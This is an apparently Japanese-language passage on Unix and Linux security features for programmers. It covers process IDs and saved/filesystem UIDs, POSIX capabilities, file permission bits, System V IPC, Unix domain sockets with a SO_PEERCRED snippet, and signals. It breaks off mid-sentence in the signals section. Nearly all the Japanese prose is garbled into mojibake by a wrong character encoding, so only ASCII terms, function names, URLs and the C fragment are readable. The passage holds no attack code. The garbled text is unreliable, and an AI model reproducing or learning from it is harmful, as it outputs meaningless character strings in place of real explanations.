lvx[X̃VXe܂B̃VXéA@\肵
ȃJ[lƏ]̓J[lŎĂ჌x̋@\u[Uvv
OƂĎĂ܂B

Unix CNȃVXeɂ́A啝ɉCsāAčhȂvĂ
MAC(B1 xȏ)̋łȃZLeBɓʑΉĂ̂܂
B̔ł̃hLgł́ÃVXe₻̉ۑ͈܂B
͈̂͂LčsƎvĂ܂Bɏڍׂȏ̂
ÂƂŗpł܂BƂ΁ASGI ́uTrusted IRIX/Bvɂ
ڂ̂́ANSA  Final Evaluation Reports (FERs) <http://
www.radium.ncsc.mil/tpep/library/fers/index.html> łB

[UOCƁÃ[U̓[UĂ uid([U ID)
 gid(O[v ID)\lɊ蓖Ă܂B uid  0 ̃[U
ʂȌ()ĂāAurootvƌĂ܂B Unix CN
ȃVXe(Unix ܂)̂قƂǂł́Aroot ̓ZLeB`FbN̂
Ƃǂ󂯂邱ƂȂAVXeǗsꍇɎgpĂ܂B
Unix VXe̒ɂ́Agid  0 ̃[UʈɂȂĂāAO[
vxŃ\[Xɑ΂Ė̃ANZXĂ̂܂
[Gay 2000, 228]B̎͑̃VXe(Linux ̂悤)ł͓Ă͂܂܂
񂪁Â悤ȃVXełĂO[v 0 ́A{IɂׂĂ̌
Ă܂BƂ̂AVXe֘A̓ʂȃt@ĆAO[v 0 
LĂP[XłBZLeB̓_猩ėBuΏہv
ƂȂ́AꂪvZXł (낢ȂƂsĂ鐳̂v
ZXȂ̂ł)BvZX͂܂܂ȃf[^ɃANZXł܂Bt@CV
Xe(FSO)łA System V ̃vZXԒʐM(IPC)łAlb
g[NE|[gł肵܂BvZX̓VOiݒł܂B
̑ZLeB֘ÃgsbNƂẮAquota  limitACuA
A PAM ܂B̌ATuZNVŏڂĂ܂B

 

3.1. vZX

Unix CNȃVXeł́A[Ux̓̓vZX𓮂ƂŎ
Ă܂B Unix VXȇ啔́uXbhvvZXƂ͓Ɨ
TOƂăT|[gĂ܂BXbh̓vZXŃL
āAVXẽXPW[̓XbhgXPW[OĂ܂
B Linux ͂Ƃ͈قȂ@ŎsĂ܂(͗DꂽƎv
܂)BXbhƃvZX͊{IɈႢ͂܂B̂ Linux
ɂẮAvZX 1 ̃vZXNɁAǂ̃\[X
L̂Ił܂(Ƃ΃LƂ)B Linux
J[ĺAXbhxőxœKɂȂ悤ɓ삵܂Bڂ
 clone(2) ĂB Linux ̃J[lJ҂́uXbhvu
vZXvƂɁAu^XNvƂt悭g_ɒӂĂ
BAΊOIȃhLgɂ́AvZXƂtg܂
(Ȃ̂ŁAł̓vZXƂtg܂)B}`EXbh̃Av
P[VvOꍇɂ́AL̂悤ȈႢB邽߁A
ʏ͕W̃XbĥǂꂩgK؂łBƈڐA
Ȃ邾łȂACuԐړIȃx̋@\ǉ񋟂ł܂B
́ÃAvP[Vx̃XbhAIy[eB
OVXe̒PƂ̃XbhƂĎs邱ƂŎĂ܂B
邱ƂŁAVXẻ炩̃AvP[V́A\炩
ł܂B

 

3.1.1. vZX̑

ł́AUnix CNȃVXeœvZXꂼꂪĂ\I
ȑĂ܂B

 E ruidArgid \\ uid Ǝ gid ̂ƂŁǍŃvZX
    ܂B
   
 E euidAegid \\ uid Ǝ gid ͌̃`FbNɗp܂(t
    @CVXe)B
   
 E suidAsgid \\ۑ uid ƕۑ gid ͉LŘ_܂ÁuL
    EvT|[ĝɗp܂B Unix CNȃVXe
    ׂĂ̋@\T|[gĂ킯ł͂܂񂪁A唼̃VX
    e(Linux  Solaris ܂)T|[gĂ܂BVXe̋@
    \ POSIX WŎĂ邩𒲂ׂȂAsysconf(2) g
    _POSIX_SAVED_IDS Lm߂ĂB
   
 E ⏕O[v\\O[v(gid)̈ꗗŁA[Uo[ɂȂĂ
    O[v̈ꗗłBIWi version 7 Unix ł́A݂Ă
    BvZX͓ɕ̃O[vɂ͑AʂȃR}hg
    ăO[vύXȂ΂܂B BSD ł́Aꂼ̃vZ
    Xł̃O[v̈ꗗT|[gĂA_ȍ\ƂĂ
    B܂̒ǉ@\݂͌ł͍LĂ܂ (Linux 
    Solaris ܂)B
   
 E umask \\Vt@CVXe̎̂쐬鎞ɁAftHg
    ANZX̐ݒ߂rbgłBumask(2)ĂB
   
 E XPW[OEp^\\vZXɂ͂ꂼAftHg̃X
    PW[Õ|V܂BSCHED_OTHER ́AǉŃp^
    ݒłA nice vCIeBAJE^[ݒł܂Bڍׂ
    A sched_setscheduler(2) ĂB
   
 E limits \\vZXPʂ̃\[X̐ł(LQ)B
   
 E t@CVXẽ[g\\vZX猩[gEt@CVXe
    ("/")̈ʒuB chroot(2)QƂĂB
   
 

ł́AvZXɊ֘AĂ͂̂́A܂ʓIł͂Ȃ̂
܂B

 E fsuidAfsgid \\ uid  gid ̓t@CVXeւ̃ANZX`
    FbN̂Ɏg܂Bʏ́Aꂼ euid  egid ƓłB
    ̑ Linux ƎłB
   
 E PCpreB\\ POSIX Œ`ĂPCpreBBvZX
    ɂẴPCpreB́A3 ܂B́AApA
    łBPOSIX PCpreBɂĂ̏ڂ́ALĂ
    B Linux ̃J[l 2.2 o[Wȏł΂̋@\T|[g
    Ă܂B Unix CNȃVXełT|[gĂ܂A
    ʓIƂ킯ł͂܂B
   
 

Linux ɂāAǂ̑eX̃vZXɊ֘AĂ̂𐳊mɒm
KvȂALinux ̃\[XR[hłM̂񌹂łB
A /usr/include/linux/sched.h ɂ task_struct Ƃ`͏dvłB

VvZXNɂ́Afork(2) VXeR[ĝʓIł
B BSD  vfork(2) ƂœK͂ǔł𓱓܂B vfork
(2) ̊{Iȍl͒PŁAgKvȂΎgȂłBڂ́A
Section 7.6 ĂB

Linux ł́AŗL̃VXeR[ł clone(2)T|[gĂ܂B
̃VXeR[ fork(2) Ɠlɓ삵܂AL\[X (
Ƃ΁At@CEfBXNv^)wł܂B܂܂
BSD VXeł rfork() VXeR[(IWi Plan9 ŊJ)
Ă܂BĂяo͈قȂ܂A{Iȍl͓ł(
L̂ɑ΂Ă̑āAvZX𐶐܂)BvO
ɈڐAȂAł΂̃VXeR[̂܂܎g
ł͂܂BLłqׂ܂AڐAȂA
VXeR[pXbhCuƂɂǂł傤B

̃hLǵAvO߂̊ȃ`[gAł͂
܂BāAvZXʓIɗpłɂĂ͏
Ă܂BɏƂ wait(2)  exit(2) ƂhLg
pł܂B

 

3.1.2. POSIX PCpreB

POSIX PCpreB̓rbgŒl\A root Ă錠
A傫ȑgݍ킹Ƃčč\܂B
POSIX PCpreB́AIEEE W̃htgŒ`Ă܂B
 Linux ŗL̋@\ł܂񂵁A Unix CNȃVXeōL
pĂ܂B Linux ̃J[l 2.0 ł POSIX PCpreBT
|[gĂ܂񂪁A 2.2 ł̓vZXɂāAPOSIX PCpreB
T|[gĂ܂B Linux ̃hLg(̃hLg܂)̒
Auroot ̌KvłvƏĂꍇAuPCpreBKv
łvƂقړӖɂȂAƃPCpreBɂẴhLg
qׂĂ܂BX̃PCpreBɂĒm肽ꍇ́APCpr
eBɊւhLgǂłB

Linux ɂẮAt@CVXeɂt@Cɑ΂ăPCpre
BKp邱ƂŏIړIłBAĂ鎞_ł́A܂
Ă܂B]@\ɑ΂PCpreB̓T|[gĂ
AftHgł͖ɂȂĂ܂BLinux ̃J[l 2.2.11 ł̓P
CpreBg߂ɗp₷@\܂B̋@\
uPCpreBEoEfBOEZbg(capability bounding set)vł
BPCpreBEoEfBOEZbǵAPCpreB̃Xg 1
ŁAVXêǂ̃vZX̊Ǘɓ܂(Ȃ΁A
 init vZXǗ܂)BPCpreBoEfBOEZb
gɂȂ΁AǂłĂvZX痘pł܂B̋@\
gĂƂāAJ[lW[̓ǂݍ݂𖳌ɂ@\
܂BIł͂܂A̋@\gc[ LCAP http:
//pweb.netcom.com/~spoon/lcap/ ܂By󒐁FLCAP ́AJ[l
T|[gĂPCpreB𖳌ɂ邱ƂɂāAVXe
Sɂdg݂łz

POSIX PCpreBɂĂ̏ڂ́A ftp://ftp.kernel.org/pub/
linux/libs/security/linux-privs ŗpł܂B

 

3.1.3. vZX̐Ƃ̑

vZX fork(2) ₨E߂łȂ vfork(2)ALinux Ǝ clone(2)g
Đ܂B̃VXeR[ׂ͂āÃvZX𕡐
A2 ̃vZX𐶐܂BvZX execve(2)A͂̃t
gGh(exec(3) system(3)Apopen(3) ̗)R[āAʂ̃v
Osł܂B

setuid  setgid ĂvOsƁAvZX euid 
egid (ꂼ)ɂ́Ãt@Cɐݒ肵ĂlZbg܂B
֊֌ẂAɂ Unix ł͋ԂNAZLeB
_̌ƂȂĂ܂BȑO setuid  setgid ĂXNvg
ΉĂłBJ[lAǂ̃C^v^삷̂
߂Ƀt@CI[v鎞ƁA(id Zbg)C^v^ɐ
ԂăC^v^t@CăI[văXNvg߂鎞̊
ɁAU҂t@C𑀂Ă܂\܂(ڂɂ̓V
{bNENoR)B

Unix CNȃVXéAsetuid XNvg̃ZLeB̖
΂āA܂܂ȂőΏĂ܂BVXeł́AsXN
vg setuid  setgid ̃rbgĂƁASɖ
܂BLinux ɊYAS͋^悤܂Bŋ߂
System V R4  BSD 4.4 ̃[Xł́AJ[l̋Ԃ邽߂
A܂Av[`ƂĂ܂B̃VXeł́AJ[l
id ZbgĂXNvgC^v^ɓnɁApXn
(ꂪԂNƂɂȂ܂)A/dev/fd/3 Ƃt@Cn
܂B̓XyVt@CŁAɂ̃XNvgŃI[vĂ
܂̂ŁAU҂p鋣Ԃ͋N肦܂B̂悤ȃVXe
ɂĂASKvȃvO setuid  setgid ĂVF
EXNvgĝɂ͎^ł܂BR͉LŘ_܂B

vZX܂܂ uid  gid ̒lɕω炷P[X݂܂
B setuid(2)  seteuid(2)Asetreuid(2)ALinux Ǝ setfsuid(2)
Bɕۑ[U id(suid)Ƃ͂̃P[XɊYA{
MꂽvOAꎞI uid ύXĂ܂܂B Unix CN
ȃVXeł́Asuid L̃[̉ŃT|[gĂ܂B ruid ̕
X euid  ruid ƈقȂlɂȂꍇ́Asuid ɂ͐V euid
̒lݒ肳܂BȂ[ÚA suid 玩 euid
Aruid  euid A euid  ruid ݒł܂B

Linux Ǝ fsuid vZX́ANFS T[ô悤ȃvOŁAt@
CVXěɌĎw肳ꂽ uid ɋ܂B̃vZ
XփVOi𑗂鋖͗^܂B euid ύX fsuid ͐V
euid ̒lɕύX܂Bfsuid  setfsuid(2)Ƃ Linux Ǝ̃VXe
R[gĐݒł܂B root ȊOĂяoꂽꍇ́Afsuid
ɂ݂͌ ruid  euidAseuidA邢݂͌ fsuid ݒł܂
B

 

3.2. t@C

ׂĂ Unix CNȃVXéAu/v񂪕ۑĂ匳ƂA
L`Ńt@C؍\Ă܂Bt@C؍\̓fB
NgKwĂāÂꂼꂪt@CVXẽt@CVX
eEIuWFNg(FSO)Ă܂B

Linux ɂẮAt@CVXẽIuWFNg(FSO)ɂ͒ʏ̃t@C
fBNgAV{bNNAOpCv(t@[XgCEt@
[XgAEgƌAFIFO ƌ肵܂)A\Pbg(LQƂ
)ALN^XyV(foCX)t@CAubNXyV
(foCX)t@C܂(Linux ł find(1)R}hɂ̈ꗗ
܂)B̑ Unix CNȃVXeł܂A͎
 FSO ̈ꗗ܂B

t@CVXeEIuWFNǵAt@CVXeɑ݂At@C
؍\ɂfBNgɃ}EgA}Eg肵܂Bt@
CVXẽ^Cv(Ƃ ext2  FAT)Ƃ́AfBXNɃf[^z
uAxMœKA̖񑩎łBut@CVXe
vƂpt@CVXe̎ނƓӖŎgꍇ悭܂
B

 

3.2.1. t@CVXeEIuWFNg̑

t@CVXẽANZX̑͑ςĂāAANZX
}EgɑIIvVɍE܂B Linux ł́Aext2 t@
CVXeƂĂ͌łʓIłAт̃t@CVX
eT|[gĂ܂BĂ Unix CNȃVXeÃt
@CVXeT|[gĂ܂BUnix CNȃVXéAꂼ
̃t@CVXẽ^CvT|[gĂ܂B

Unix CNȃVXȇ́AȂƂL̏L^Ă܂B

 E L uid  gid \\t@CVXeEIuWFNǵuLҁv
    ʂ܂Bɒf肪ȂAʂ͏L҂ root AN
    ZXɊւ鑮ύXł܂B
   
 E rbg\\[U(L)AO[vȂƂɁAǂݍ݁A
    ݁Aš\rbgBʏ̃t@C̏ꍇ́Aǂ݁A
    AsƂʂ̈Ӗ܂BfBNg̏ꍇAuǂݍ
    ݁vp[~bV͂̃fBNg̒邱ƂӖAu
    svp[~bV́Aʖuvp[~bVƂA
    ɂ̃fBNgɓāAɂ̂gpł܂Bu
    ݁vp[~bV́ÃfBNgŃt@C̒ǉA폜AύX
    ł܂Bǉꍇ́ALɐ sticky r
    bg𗧂Ă邱ƁBV{bNÑp[~bV́AӖ
    ȂƂɒӂĂBӖ̂́AV{bNN
    ݂ĂfBNgƃÑt@Cg̃p[~bVl
    łB
   
 E usticky rbgv\\fBNgɐݒ肳ƁA폜(ړ)▼O
    ύX́At@C̏L҂fBNg̏L҂ root s
    ȂȂ܂B Unix ʂŗpĂg@\ŁAOpen
    Group  Single Unix Specification version 2 ɒ߂Ă܂BÂ
    o[W Unix ł́usave program textvrbgƌĂ΂A
    풓(XbvAEgȂ)s`t@Cł邱ƂĂ
    ܂BꂪsVXeł́Aroot ̃rbgݒł
    悤ɂĂ܂(ȂƁA[Uuׂāvɓ
    ܂ƂŁAVXeNbVłĂ܂܂)B Linux ł́A
    ̃rbg͒ʏ̃t@Cɑ΂āẢe^܂B܂
    [UłALt@Cɑ΂Đݒ肪\łB Linux 
    zǗɂāA̋@\͂Ă܂܂
    B
   
 E setuidAsetgid \\s`t@Cɐݒ肳ƁA uid  gid
    ɂ̃t@C̏L ID  gid ݒ肳܂(eXƗ)B Unix
    CNȃVXéA̋@\ׂăT|[gĂ܂B Linux 
    System V ł́Asetgid s܂Ȃt@Cɐݒ肳
    ƁÃt@CANZXĂ鎞ɁAbN(mandatory
    locking) ̃t@Cɂ܂(A}EgĂt@C
    VXebNT|[gĂ)B̎dgׂ݂͕
    ɏdAUnix CNȃVXeōL̗pĂ͂܂Bۂɂ́A
    Open Group  Single Unix Specification version 2  chmod(3)ŁA
    肪ӖȂAVXe͎sȂt@Cɑ΂ setuid L
    ɂv𖳎Ă悢ƂɂȂĂ܂B Linux  Solaris
    ł́Asetgid fBNgɐݒ肳ƁÃfBNgɍ쐬
    t@ĆAIɂ̃fBNg gid ɐݒ肵܂B
    ̕@Ŏł̂AuvWFNgpfBNg̍쐬vł
    Bʂɐݒ肵fBNgɃ[Ut@CۑƁAO[
    v̏L҂IɕύX悤ɂȂ܂BAfBNg
     setgid rbg𗧂Ă邱Ƃ Single Unix Specification ̂悤ȋK
    iƂċK肳Ă킯ł͂܂[Open Group 1997]By󒐁F
    t@C̃bN@\ɂ́AbN(mandatory locking)ƃAhoCU
    EbN(advisory locking)܂BႢ́AO҂J[lv
    ZXĎbNŝŁAvZXԂ̈ˑ֌Wză
    bN\łBɑ΂Č҂́AvZXgbNs
    ̂ŁÃvZX̐Ô̂ɑ΂Ă̓bNƂȂ܂B
    ڂ́AJ[lt̃hLg linux/Documentation/
    mandatory.txt QƂĂz 
   
 E ^CX^v\\t@CVXeEIuWFNgɂ́AANZX
    AC肵ԂLĂ܂BAL҂͎Rɂ
    ̒lύXł̂(touch(1)Q)ȀՂɐM
    悤ɂĂB Unix CÑVXéAׂĂ̋@\T
    |[gĂ܂B
   
 

ĹAext2 t@CVXegĂ Linux Ǝ̑ɂȂ܂B
A@\̃t@CVXe񂠂܂B

 E ύXs(immutable)rbg\\t@CVXeEIuWFNgɑ΂
    AȂύXF߂܂B root ݒƉł܂B
    dǵ݂Aext2 t@CVXeT|[gĂAׂĂ
    Unix VXe(ꍇɂĂ Linux t@CVXeł)ŗpł
    킯ł͂܂B
   
 E ǉ(append-only)rbg\\̂́At@CVXeEI
    uWFNg̒ǉłB root ݒƉł܂B̎d
    ǵ݂Aext2 t@CVXeT|[gĂAׂĂ Unix
    VXe(ꍇɂĂ Linux t@CVXeł)ŗpł킯
    ł͂܂B
   
 

g@\őɈʓIȂ̂́Aũt@CȂvƂrb
głB

L̒ĺA}EgɓKpꍇ̂ŁArbglɒl
(}̏̒lł)Ă̂悤Ɉꍇ܂B
Ƃ mount(1)QƂĂB̃rbg͖ɗ܂A
ӂKv܂B͕ՂŎg₷ƁAsׂh
ɏ\ȂƂłBƂ΁ALinux ɂĂ̓}Eg鎞Ɂunoexecv
ƁÃt@CVXeł̓vO̎słȂȂ܂B
man ɂLqĂʂA͂̃VXeƌ݊̂ȂVXeœ
oCit@CVXe}Eg悤ƂꍇɎg܂B
Linux ł́ÃIvVŒNt@Cs邱ƂSɂ͖h
܂B̃t@CǂɃRs[AŎsłĂ܂܂
Au/lib/ld-linux.so.2vƂR}hgāÃt@C𒼐ڎ
słĂ܂łB

t@CVXeɂ́ÃANZXɑ΂rbglT|[g
ĂȂ̂܂BJԂ܂Amount(1)āAt@CVXe
ǂ̂悤Ɉ̂mFĂBƂ킯 MS-DOS fBXN
́AUnix CNȃVXeŃT|[gĂP[XAftHg
͂ق̂킸ȑT|[gĂ܂(܂̑`
͕̂ʂƂ͂܂)B̏ꍇAUnix CNȃVXe͕WIȑ
G~[g܂(炭ʂȃt@CfBXNɒuāA
Ă܂)B܂̑́A mount(1) R}hŒł܂B

ӂׂdvȓ_́At@CǉA폜肷̂Ɋ֌W
̂Ãt@C̃p[~bV\rbgƂ̃t@C
fBNg̏L҂AƂ_łB Unix CNȃVXeA
荂xȎ@(POSIX ACL ̂悤)ĂΘb͕ʂłBVXe
ɑ̊g@\Ȃꍇ(Linux 2.2 ͕ʂ͎Ă܂)̓p[~bV
\rbgɉp[~bVt@ĆAfBNgɋ
Ȃ폜łĂ܂܂B܂AefBNgqfBNg
Ƀ[UO[vύXł悤ɂĂƁÃfBNgz
ׂ̂͂āÃ[UƃO[vɒu\ɂȂ܂B

ZLeBɊւāAIEEE  POSIX Kił́AACL ɊւĂ̂Ƃ
Zp`ĂāA[UO[vp[~bṼXgT
|[gĂ܂BcOȂƂɁALT|[gĂȂłȂ
AUnix CNȃVXełĂƓ@ŃT|[gĂ܂
BƂ΁Aʂ Linux 2.2̓t@CVXe ACL ͂납APOSIX
PCpreB̒l玝Ă܂B

Linux Œڂɒl̂́AftHgł root [Uɑ΂ ext2 t@
CVXë̗ق̂킸蓖ĂȂ_łB́AsS
ł͂܂T[rXۍUɑ΂ĖhɂȂ܂B郆[U root
[UƋLĂfBXNtɂƂĂAroot [Uɂ͎gc
łƂ̈悪c܂(ƂΏdvȋ@\̂߂ɂƂĂ
)BftHgł́At@CVXë 5% mۂĂ܂B
mke2fs(8) ́u-mvIvV悭ĂB

 

3.2.2. 쐬̏l

쐬ɂ́AL̃[KpĂ܂B Unix VXeł́AV
t@CVXeEIuWFNg creat(2)  open(2) ō쐬ƁA
uid ɂ͂̃vZX euid ݒ肳Agid ɂ͂̃vZX egid 
ݒ肳P[X܂B Linux ł fsuid Ƃg@\
AXقȂĂ܂B uid ɂ͂̃vZX fsuid Agid ɂ͂
vZX fsguid ݒ肳܂BfBNg setgid rbg
邩Ãt@CVXe grpid Ă΁Agid ͂̃fBN
g gid ۂɂ͐ݒ肳܂BfBNg setgid g@\
ASun Solaris  Linux ܂ޑ̃VXeŃT|[gĂ܂Bɏ
܂AuvWFNgvfBNg(uvWFNgvp̃fB
Ng)ł́ÃvWFNgpɓʂɃO[v쐬܂BfBNg
͂̃O[vL҂ setgid Ă܂BɃt@Cu
AIɃvWFNgL邱ƂɂȂ܂BlɁAsetgid rbg
ĂfBNgɐVTufBNg쐬(t@CV
Xe grpid ݒ肵ĂȂ)AVTufBNgɂ setgid
rbgݒ肳܂(܂vWFNgp̃TufBNgɂDs
)BȊÕP[Xł́Asetgid ͐V쐬t@Cɑ΂Ă͕
ʂɐU镑܂Bu[UvCx[gO[vvƂdg݂̗_I
ɂ܂(Red Hat Linux ŎgĂ܂)B̎dg݂ɂ
ẮAo[ꂼ͎ō\ĂuvCx[gvO
[vɑĂāAftHgł͂̃O[vɂǂ̃t@C̓ǂݏ
\ƂĂ܂(O[vɑĂ͎̂Ȃ̂)B̂
ɁAt@C̃O[v\o[pƁAǂݏ̌p
킯łBy󒐁F[UvCx[gO[vɂẮA̐
ł͂킩̂ŁA[UvCx[gO[v <http://
www.jp.redhat.com/manual/Doc71/RHDOCS/rhl-rg-ja-7.1/
s1-users-groups-private-groups.html> QƂĂ݂Ăz{Iȃt
@CVXeEIuWFNg̃ANZX̒l(ǂݏAs)́A (v
ꂽl & ~ vZX umask)犄o܂BVt@Cł́A
sticky rbg setuid rbgɗĂ܂B

 

3.2.3. ANZX䑮̕ύX

chmod(2) fchmod(2)Achmod(1) gĕύXł܂Achown(1) chgrp
(1) ĂB Linux ł́ALinux Ǝ̑ chattr(1)őł
̂܂B

Linux Œӂ_́Aroot t@C̏L҂ύXłȂ_ł
B Unix CNȃVXeɂ́Aʃ[Uł̃[UɃt@C̏L
ړłĂ܂̂܂B͍ƂȂ̂ŁALinux
ł͋Ă܂BƂ΁AfBXNgpʂ̐ꍇɂ
悤ȑ삪łĂ܂ƁA傫ȃt@C͑̐l(])̂A
Ă܂ƂɂȂ܂B

 

3.2.4. ANZX䑮gp

Linux ⑼ Unix CNȃVXȇ唼ł́Aǂݏ̑l̓t@C
I[vɂ`FbN܂B܂肻̌ɓǂݏĂ
Aă`FbN͍s܂BAt@CVXe Unix CNȃV
Xe̍Ȃ̂ŁAVXeR[xĂяoƂŁȂ
`FbNĂ܂B̑`FbNVXeR[ɂ́A
open(2) creat(2)Alink(2)A unlink(2)Arename(2)Amknod(2)Asymlink
(2)Asocket(2) ܂B

 

3.2.5. t@CVXe̊Kw

N̊ŁAũt@C͂ǂɒuvƂ񑩎܂Bo
邾܂āAfBNgKw̒ɏi[ĂB
Ƃ΁AŜɊ֘Aݒ /etc ɒuĂB Filesystem
Hierarchy Standard (FHS)́Å_Iɒ`悤ƂĂA
Linux VXe͍L̗pĂ܂B FHS ͏] Linux Filesystem
Structure standard (FSSTND)Abvf[ĝŁALinux  BSDA
System V mbq؂Ă܂B http://www.pathname.com/fhs  FHS
̏񂪂܂ABTɂĂ Linux ł hier(5)
ASolaris ł hier(7)QƂĂB͎ɂ͈vȂꍇ
܂ARpCCXg[ɉ\ȌZʂ悤ɂ
ĂB

Linux Standard Base <http://www.linuxbase.org> AFHS ̗pƂ
GĂ܂B̑gD Linux fBXgr[VԂ̌݊
A Linux VXeȂǂȃ\tgEFAł삷悤ɋKi
A𑣐i@ւłB

 

3.3. System V IPC

Linux  System V ܂ Unix CNȃVXȇ́ASystem V ̃v
ZXԒʐM(IPC)T|[gĂ܂BASystem V IPC  Open Group
 Single UNIX Specification Version 2 ŕK{ɂȂĂ܂[Open Group
1997]B System V  IPC  3 ̂̂\Ă܂BbZ[WE
L[AZ}tHALłBꂼ͉̑L̒ʂł
B

 E 쐬҂쐬҂O[vȂ̎҂̓ǂݏ̃p[~bV
    B
   
 E 쐬 uid  gid \\쐬҂ uid  gidB
   
 E L uid  gid \\L҂ uid  gid(Ԃł͍쐬҂ uid
    Ɠ)B
   
 

L̃[ɂƂÂăANZX܂B

 E vZX root ̌Ă΁AANZX͋܂B
   
 E vZX euid L҂͍쐬҂ uid ƓȂA쐬҂̃p
    [~bVāAȂ΃ANZX܂B
   
 E vZX euid L҂͍쐬҂ gid ƓA̓vZ
    X̑O[v̒ɏL҂͍쐬҂ gid Ɠ̂
    ΁A쐬҂̃p[~bVāAȂ΃ANZX
    B
   
 E ȏɓĂ͂܂Ȃ΁Aȗ̃[Uṽp[~bV`F
    bN܂B
   
 

root ͏L҂쐬҂ euid vZX́AL҂ uid 
gid ݒłA܂폜\ł邱ƂYȂłBڂ
ipc(5)QƂĂB

 

3.4. \Pbgƃlbg[Nڑ

\Pbg͏`iƂāAɃlbg[Nz̒ʐMɎgp
Ă܂B\PbǵA Unix VXe̗ 1 ł BSD n
J܂B Unix CNȃVXeɑ΂ĂA悻ڐA
₷ȂĂ܂B Linux  System V n̓\Pbg BSD Ɠx
ŃT|[gĂAOpen Group  Single Unix Specification [Open Group
1997]łK{ƂĂ܂BȑO System V VXeł́Albg[Nz
̒ʐMC^tF[XʂɎĂ܂(݊܂ł)
ASolaris ̂悤ȃVXe\PbgT|[gĂ̂͒ڂɒl
B socket(2)͏`邽߂̐ڑ|Cg쐬AfB
XNv^Ԃ܂B̓t@Cɑ΂ open(2)ƂӖł
B\Pbg̃p^ɂ́AvgREt@~[ƃ^Cvw肵܂B
܂C^[lbgEhC(TCP/IP version 4) Novell  IPX 
́uUnix hCvƂ悤ɁBT[óAʏ bind(2)Ăł
listen(2)ĂсAaccept(2)  select(2)܂BNCAg͂Ƃ
ƁAbind(2)(ȗꍇ)ĂсAconnect(2)܂Bڂ
ꂼ man QƂĂB\Pbg𗘗p̂ man ł
܂B Hall "Beej" [1999]̂悤ȎǂŁAǂ
ẴVXeR[gݍ킹ėp̂wԂ̂悢Ǝv
܂B

uUnix hCE\Pbgv̓lbg[NEvgRɎۂ͊Y܂
BƂ̂́A}VŐڑɉ߂ȂłB (̃hL
gĂ鎞_̕WI Linux J[lł) Xg[ƂĂ
̃\PbggꍇAOpCvƔɎĂ͂܂Aۂ
܂B Unix hCE\PbgRlNVwł_ɒ
ĂB\Pbgɑ΂Vڑ́AꂼVڑ`l
ƂȂ܂B̓_OpCvƂ͑傫قȂ_łB̓ɂ
āAUnix hCE\PbǵAOpCv̑ɎgAIPC 
AdvȃT[rXL񋟂Ă܂BOȂpCvȂ̂
Asocketpair(2)gāAOȂ Unix hCE\Pbgg
BOȂ Unix hCE\PbǵAOȂpCvƂxĂ
̂ŁAIPC Ɏg܂B

Unix hCE\Pbgɂ́AZLeBɊւ鋻[_
܂B܂AUnix hCE\Pbg̓t@CVXeɑ݂悤
ɌAstat(2) pł܂Aopen(2)ł͊J܂(socket(2)Ƃ
Ԃ̃C^tF[XgȂ΂܂)BɁAUnix hCE\
Pbg̓t@CEfBXNv^ŃvZXԂƂ肵܂(t@C
gł͂Ȃ)B̕ς@\́A܂ŐFXȏʂŎgĂ܂
B IPC ̎ił́A̋@\𗘗pł܂(fBXNv^́A
Rs[^ETCGX̌tŌuPCpreBv̐łƂ
ėpł܂)Bt@CfBXNv^ sendmsg(2)gđA
ɂ msg(bZ[W) tB[hɓ msg_control  control
message ̃wb_zwĂ܂(msg_controllen tB[h͔z
oCĝw肵ĂȂ΂܂)B control message 
cmsghdr \̂ɂȂĂāAf[^̌Ɏf[^Ă܂B
̖ړIɎgȂAcmsg_type  SCM_RIGHTS ݒ肵ĂBt@C
fBXNv^ recvmsg(2) gĎoA͎悤ȕ@Ńf[
^ɍs܂BƁA̋@\͂ƂĂĂ@łA
mĂĂʂł͂܂B

Linux 2.2 ȍ~ Unix hCE\Pbgɂɋ@\ǉĂ܂
B͑葤́uF؁vł_ł(pid  uidAgid 𗘗p\)BT
vR[h͉L̂悤ɂȂ܂B

 /* fd= file descriptor of Unix domain socket connected                
    to the client you wish to identify */                              
                                                                       
 struct ucred cr;                                                      
 int cl=sizeof(cr);                                                    
                                                                       
 if (getsockopt(fd, SOL_SOCKET, SO_PEERCRED, &cr, &cl)==0) {           
   printf("Peer's pid=%d, uid=%d, gid=%d\n",                           
           cr.pid, cr.uid, cr.gid);                                    

WI Unix ł̊ł́ATCP  UDP ̃[Jȃ|[gԍ 1024 
菬Aroot ̌KvɂȂ܂BvZX 1024 ȏ̃|[g
ł΁AɂȂ܂B Linux ͂̊𓥏PĂāA
ɃvZX CAP_NET_BIND_SERVICE ƂPCpreBKvƂȂA
 1024 ȉ̃|[gԍɐڑł܂Bʏ킱̃PCpreB́A
euid  0 łvZXƂł܂B`DȐlȂA
Linux ̃\[X𒲂ׂ΂킩܂B Linux 2.2.12 Ȃ /usr/src/linux/
net/ipv4/af_inet.c ɂ֐ inet_bind()łB

 

3.5. VOi

VOíAUnix CN OS EɂPȁu荞݁vŁA
Unix ł͌Â炠@\ 1 łBvZX́AuVOivʂ̃v
ZXɑ(Ƃ kill(1) kill(2) g)Ȃ̃vZX
A񓯊ɂ̃VOi܂BvZX̃vZX
Cӂ̃VOi𑗂ɂ́ÃvZX root ́Ãv
ZX͎̎[U id ̌ĂȂ΂܂B
AVOiʂ̕@ő邱Ƃł܂B SIGURG ̓lbg[N
z TCP/IP ̃AEgEIuEoh(out-of-band (OOB))bZ[Wg
đ܂By󒐁FuAEgEIuEohvƂ́Af[^Ƃ͓Ɨ̒ʐM
oHgāAp邱Ƃłz

VOi͂ɂ Unix ̋@\ 1 łA܂
܂łBuVOiĂ鎞ɁÃVOiǂȂ
HvƂ{IȖĂ܂B libc5 ̗pĂÂ Linux
ł̓VOîő@ŐV GNU libc CuƈقȂ_
܂BVOinh C Cu֐SɌĂяoȂꍇ
悭AVXeR[̒ɂASłȂ̂܂BhL
gmFāAVOiĂяoĂSł邱Ƃۏ؂Ă
邩mFĂBڂ́Aglibc FAQ([J /usr/doc/
glibc-*/FAQ ƂRs[VXe܂)ĂB

VvOȂAPOSIX VOiVXe(BSD ̂̂ɂ
) gĂB̎dg݂͍LT|[gĂāAÂVOi
VXeĂ̂Ă܂B POSIX VOiVX
éAsigset_t Ƃf[^^gƂOɂĂāÃf[^^
֐ɂđł܂B̊֐́A sigemptyset() sigfillset
()Asigaddset()Asigdelset()Asigismember()łB sigsetops(3)ɂ
̊֐ɂĂ̐܂Bݒ肵ȂAsigaction(2)
sigprocmask(2)Asigpending(2)A sigsuspend(2)gāAVOȋ
ݒ肵Ă(ڍׂȏ man Ă)B 

ʏ̓VOinhǂł邾ZPɂAԂɒ
ӂĂBVOi͂񓯊ɔ̂ŁA炭
ԂNł傤B

T[oɂ͂鋤ʂႪ܂BSIGHUP 󂯂ꍇɂ́AOt@
